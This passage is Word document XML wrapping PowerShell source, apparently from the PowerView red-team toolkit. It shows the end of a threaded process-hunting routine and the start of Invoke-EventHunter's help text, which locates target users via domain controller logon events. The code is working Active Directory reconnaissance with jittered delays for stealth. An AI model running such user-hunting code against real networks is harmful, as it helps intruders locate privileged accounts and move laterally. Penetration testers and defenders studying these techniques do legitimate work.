        <w:t xml:space="preserve">                            if ($Process.ProcessName -match $_) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672B474D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                $Process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025B33E9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE32A70" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DFFEC1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543D0A74" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    # if the session user is in the target list, display some output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C6E3E6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    elseif ($TargetUsers -contains $Process.User) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D21CDA4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $Process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DAD350" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E96985" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A81FBC5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A46FFD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A68F1F6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="371734EC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10561150" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="50E2D9CB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    process {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CA0F46" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="47B8B1B1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if($Threads) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1385B529" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Write-Verbose "Using threading with threads = $Threads"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B83A1EA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="53E75471" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # if we're using threading, kick off the script block with Invoke-ThreadedFunction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9F42FF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $ScriptParams = @{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DA2992" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                'Ping' = $(-not $NoPing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3079A679" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                'ProcessName' = $ProcessName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F44108" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                'TargetUsers' = $TargetUsers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466F97EA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                'Credential' = $Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4223B4D7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDD64DC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3E733413" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # kick off the threaded script block + arguments </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A182F5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Invoke-ThreadedFunction -ComputerName $ComputerName -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2329EAD7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A22FAEC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4B00E7C8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC8B866" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if(-not $NoPing -and ($ComputerName.count -ne 1)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B570B9A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # ping all hosts in parallel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1564F82D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Ping = {param($ComputerName) if(Test-Connection -ComputerName $ComputerName -Count 1 -Quiet -ErrorAction Stop){$ComputerName}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D919908" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $ComputerName = Invoke-ThreadedFunction -NoImports -ComputerName $ComputerName -ScriptBlock $Ping -Threads 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A8BB12" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251D8259" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="781E5DE1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Write-Verbose "[*] Total number of active hosts: $($ComputerName.count)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400480DE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Counter = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D08F81" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="671E0CF2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            ForEach ($Computer in $ComputerName) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E38BE4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="627A537D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Counter = $Counter + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E1BBF4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="33F43571" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # sleep for our semi-randomized interval</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB2F390" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E36A809" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="11D9617A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Write-Verbose "[*] Enumerating server $Computer ($Counter of $($ComputerName.count))"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7D30B4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Result = Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $Computer, $False, $ProcessName, $TargetUsers, $Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC249BF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749414DA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6FF0E1C2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if($Result -and $StopOnSuccess) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0711C558" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    Write-Verbose "[*] Target user/process found, returning early"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCC69CE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7003DD73" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5367E8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC6151C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5324A73E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4030C7B8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6AC1A6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5C93D50B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2E60FBBC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>function Invoke-EventHunter {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A634FC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584B91A5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661F4892" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="592FFCE1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Queries all domain controllers on the network for account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21051689" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        logon events (ID 4624) and TGT request events (ID 4768),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3E5498" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        searching for target users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0140285C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1558FC6F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Note: Domain Admin (or equiv) rights are needed to query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D8EBD8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        this information from the DCs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DC8151" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2B59D954" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Author: @sixdub, @harmj0y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F34608" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        License: BSD 3-Clause</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD26490" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4568E957" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ComputerName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CC805A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1464DD0E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Host array to enumerate, passable on the pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C812C30" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="02891FEF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    .PARAMETER ComputerFile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619AB5EA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0741C4A7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        File of hostnames/IPs to search.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012201B4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="10A8115D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ComputerFilter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AAECE64" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3F309ABF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Host filter name to query AD for, wildcards accepted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46AD6D5C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="06494E06" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ComputerADSpath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4542E95D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="32FF5C91" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The LDAP source to search through for hosts, e.g. "LDAP://OU=secret,DC=testlab,DC=local"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098F00F8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Useful for OU queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E24D8D9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="769FE3DB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER GroupName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF53F64" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="518DE2D4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Group name to query for target users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B43B076" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7ED589B6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER TargetServer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61110C11" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6608D93E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Hunt for users who are effective local admins on a target server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C82FD08" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4832101F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER UserName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A1449C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1CD1FC3A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Specific username to search for.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC5F198" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4AD23AB8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER UserFilter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E239143" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3588B12D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        A customized ldap filter string to use for user enumeration, e.g. "(description=*admin*)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5801CC4F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5807DF0B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    .PARAMETER UserADSpath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41049BDD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="68DC3238" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The LDAP source to search through for users, e.g. "LDAP://OU=secret,DC=testlab,DC=local"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627F6C61" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Useful for OU queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6D9D81" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="014036A8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER UserFile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177D87E0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="45D262BC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        File of usernames to search for.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33229AC8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5198A998" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER NoPing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68AF1C3C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="20DB18D8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Don't ping each host to ensure it's up before enumerating.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1054D14A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="20EDCDEA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E014F2A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7346F132" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Domain for query for machines, defaults to the current domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039FFD6F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2BCA3EF4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER DomainController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DDCFE4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="407D089D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Domain controller to reflect LDAP queries through.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C03E03" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4517BDCD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER SearchDays</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD92A9A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="38443A93" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Number of days back to search logs for. Default 3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C87F112" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="763806F1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER SearchForest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6F4FB9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6F5255EE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Search all domains in the forest for target users instead of just</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B7709D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        a single domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C681944" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="509E2490" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Threads</w:t>
      </w:r>
    </w:p>
